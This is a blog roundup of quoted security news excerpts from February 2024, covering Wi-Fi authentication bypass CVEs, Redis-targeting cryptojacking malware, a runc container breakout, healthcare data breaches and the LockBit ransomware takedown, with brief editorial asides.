Security Leftovers

posted by Roy Schestowitz on Feb 23, 2024

• Hacker News ☛ New Wi-Fi Vulnerabilities Expose Android and Linux Devices to Hackers

  Cybersecurity researchers have identified two authentication bypass flaws in open-source Wi-Fi software found in Android, Linux, and ChromeOS devices that could trick users into joining a malicious clone of a legitimate network or allow an attacker to join a trusted network without a password.

  The vulnerabilities, tracked as CVE-2023-52160 and CVE-2023-52161, have been discovered following a security evaluation of wpa_supplicant and Intel's iNet Wireless Daemon (IWD), respectively.

  The flaws "allow attackers to trick victims into connecting to malicious clones of trusted networks and intercept their traffic, and join otherwise secure networks without needing the password," Top10VPN said in a new research conducted in collaboration with Mathy Vanhoef, who has previously uncovered Wi-Fi attacks like KRACK, DragonBlood, and TunnelCrack.

• Gray Dot Media Group ☛ New Linux Malware “Migo” Exploits Redis for Cryptojacking, Disables Security [Ed: The problem here is not Linux but Redis; that's like blaming Windows for Photoshop.]

  New “Migo” malware targets Linux servers, exploiting Redis for cryptojacking. Using a user-mode rootkit, hides its activity, making detection difficult. Secure your Redis servers and stay alert!

  A sophisticated Linux malware campaign has been discovered targeting Redis, a popular data store system, to gain initial access using “System Weakening Commands,” revealed Cado Security Labs.

• New Mingo Malware Attacking Linux Redis Servers To Mine Cryptocurrency [Ed: Again, the issue here is not Linux]

  The campaign employed many Redis system-weakening commands to potentially disable data store security features that could hinder their initial attempts at access.

• LWN ☛ A turning point for CVE numbers

  The Common Vulnerabilities and Exposures (CVE) system was set up in 1999 as a way to refer unambiguously to known vulnerabilities in software. That system has found itself under increasing strain over the years, and numerous projects have responded by trying to assert greater control over how CVE numbers are assigned for their code. On February 13, though, a big shoe dropped when the Linux kernel project announced that it, too, was taking control of CVE-number assignments. As is often the case, though, the kernel developers are taking a different approach to vulnerabilities, with possible implications for the CVE system as a whole.

• LWN ☛ Another runc container breakout

  Once again, runc—a tool for spawning and running OCI containers—is drawing attention due to a high severity container breakout attack. This vulnerability is interesting for several reasons: its potential for widespread impact, the continued difficulty in actually containing containers, the dangers of running containers as a privileged user, and the fact that this vulnerability is made possible in part by a response to a previous container breakout flaw in runc.

  The runc utility is the most popular (but not only) implementation of the Open Container Initiative (OCI) container runtime specification and can be used to handle the low-level operations of running containers for container management and orchestration tools like Docker, Podman, Rancher, containerd, Kubernetes, and many others. Runc also has had its share of vulnerabilities, the most recent of which is CVE-2024-21626 — a flaw that could allow the attacker to completely escape the container and take control of the host system. The fix is shipped with runc 1.1.12, with versions 1.0.0-rc93 through 1.1.11 affected by the vulnerability. Distributors are backporting the fix and shipping updates as necessary.

• Data Breaches ☛ HHS’ Office for Civil Rights Settles Second Ever Ransomware Cyber-Attack for $40,000 and a Corrective Action Plan with OCR Monitoring

  Ransomware and hacking are the primary cyber-threats in health care. Over the past five years, there has been a 256% increase in large breaches reported to OCR involving hacking and a 264% increase in ransomware. In 2023, hacking accounted for 79% of the large breaches reported to OCR. The large breaches reported in 2023 affected over 134 million individuals, a 141% increase from 2022.

• Information Security Media Group, Corporation ☛ Hack at Services Firm Hits 2.4 Million Eye Doctor Patients

  Medical Management Resource Group, which does business as American Vision Partners, works with – and “shares” a management system, IT and infrastructure with – 12 practices, according to its website. The incident involved the hack of a network server and affected more than 2.35 million individuals, the company said in a Feb. 6 report to the Department of Health and Human Services.

  The Tempe, Arizona-based firm said that on Nov. 14 it had detected unauthorized activity on certain parts of its network. MMRG said it had promptly taken steps to contain the incident, including isolating the affected system and engaging assistance from outside cybersecurity firms.

• National Law Review US ☛ Data Breach Putative Class Action Questions Whether Broker Was Swift Enough in Notice and Response

  While America was tuned into the big game, one California insurance broker faced its own treacherous showdown in the form of a putative class action filed on February 8, 2024 stemming from a data breach. With cyber incidents still on the rise, this is a story we know all too well: an unauthorized third party gains access to personally identifiable information, the company eventually detects the threat actor and leadership must decide how to respond. Once notifications to the public go out, the individuals impacted often file suit to recover for their alleged harm.

• Secureworks ☛ Unpicking LockBit — 22 Cases of Affiliate Tradecraft [Ed: Windows TCO]

  The GOLD MYSTIC threat group has operated the LockBit name-and-shame ransomware-as-a-service (RaaS) scheme since mid-2019, exploiting unauthorized access to thousands of organizations to deploy ransomware and steal data to facilitate the extortion of victims. At approximately 4:00 pm EST on February 19, 2024, the UK's National Crime Agency (NCA) and U.S. Federal Bureau of Investigation (FBI), in conjunction with international law enforcement partners, took disruptive action against the infrastructure used by the LockBit RaaS operation.

  Secureworks® incident responders investigated 22 compromises featuring LockBit ransomware from July 2020 through January 2024. These investigations revealed the tactics, techniques, and procedures (TTPs) that LockBit affiliates have used in their intrusions. The complexity of operations varies from manual encryption of individual hosts to automated ransomware deployments from domain controllers. In some incidents, ransomware is not deployed at all. Instead, affiliates rely on data theft alone to extort victims. LockBit's evolution includes targeting VMware ESXi hosts to encrypt virtual machines, which can have a devastating impact on organizations that rely heavily on virtualized infrastructure. As the LockBit brand has grown in stature, copycat cybercriminals have sought to exploit the name for their own ransomware operations or other extortion threats.

• Data Breaches ☛ Reward Offers for Information on LockBit Leaders and Designating Affiliates [Ed: Windows TCO]

  Since January 2020, LockBit actors have executed over 2,000 attacks against victims in the United States, and around the world, causing costly disruptions to operations and the destruction or exfiltration of sensitive information. More than $144 million in ransom payments have been made to recover from LockBit ransomware events.

• NJ Addiction Centers Victim Of Data Breach

  Maryville, a nonprofit addition agency, is offering credit monitoring services for those who may have had their Social Security numbers and other private details exposed as a result of the incident, according to spokesman Bill Crowe.

  The centers affected are in Williamstown, Turnersville, Pemberton, Vineland and Franklinville.

  "We have no indication that any information has been misused for identity theft," the agency said.

• Data Breaches ☛ Change Healthcare responding to cyberattack; few details known at this point

  Early yesterday, Change Healthcare reported that they were experiencing enterprise-wide connectivity issues. They didn’t call it a cyberattack at that point, but by mid-day, their status reports were indicating that they were experiencing “a network interruption related to a cyber security issue.” A few hours later, they added a statement, “Once we became aware of the outside threat, in the interest of protecting our partners and patients, we took immediate action to disconnect our systems to prevent further impact. The disruption is expected to last at least through the day. We will provide updates as more information becomes available.”

  Change Healthcare has issued updates every few hours since then. As of this morning, their updates no longer say the disruption is expected to last at least through the day. Now it offers no prediction of how long the disruption will last and merely states, ” We will provide updates as more information becomes available.”